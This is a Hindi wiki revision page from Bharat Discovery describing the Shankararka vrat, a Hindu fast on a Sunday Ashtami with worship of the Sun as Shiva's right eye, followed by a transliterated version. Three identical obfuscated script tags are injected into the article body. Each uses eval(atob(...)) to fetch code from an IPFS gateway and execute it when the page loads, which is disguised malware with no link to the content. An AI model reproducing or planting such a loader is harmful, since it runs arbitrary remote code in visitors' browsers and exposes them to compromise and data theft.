Difference between revisions of "शंकरार्क व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
m
 
(4 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[रविवार]] को पड़ने वाली [[अष्टमी]] पर शंकरार्कव्रत किया जाता है।
 
*[[रविवार]] को पड़ने वाली [[अष्टमी]] पर शंकरार्कव्रत किया जाता है।
 
*[[शंकर]] की दाहिनी [[आँख]] में स्थित [[सूर्य देव|सूर्य]] की पूजा की जाती है।
 
*[[शंकर]] की दाहिनी [[आँख]] में स्थित [[सूर्य देव|सूर्य]] की पूजा की जाती है।
 
*अर्ध चन्द्र की आकृति में कुंकुम एवं लाल चन्दन से एक वृत्त बनाकर उसमें स्वर्ण से जड़ित एक माणिक रखना, जिसे शंकर की आँख कहा जाएगा
 
*अर्ध चन्द्र की आकृति में कुंकुम एवं लाल चन्दन से एक वृत्त बनाकर उसमें स्वर्ण से जड़ित एक माणिक रखना, जिसे शंकर की आँख कहा जाएगा
 
*तिथिव्रत; [[देवता]] शंकर की आँख के रूप में [[अर्क]] (सूर्य) की पूजा की जाती है।
 
*तिथिव्रत; [[देवता]] शंकर की आँख के रूप में [[अर्क]] (सूर्य) की पूजा की जाती है।
*यदि [[माणिक]] न हो तो [[सोना]] ही पर्याप्त होना चाहिए।
+
*यदि [[माणिक्य]] न हो तो [[सोना]] ही पर्याप्त होना चाहिए।
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 07:05, 15 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • ravivar ko p dane vali ashtami par shankararkavrat kiya jata hai.
  • shankar ki dahini aankh mean sthit soory ki pooja ki jati hai.
  • ardh chandr ki akriti mean kuankum evan lal chandan se ek vritt banakar usamean svarn se j dit ek manik rakhana, jise shankar ki aankh kaha jaega
  • tithivrat; devata shankar ki aankh ke roop mean ark (soory) ki pooja ki jati hai.
  • yadi maniky n ho to sona hi paryapt hona chahie.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>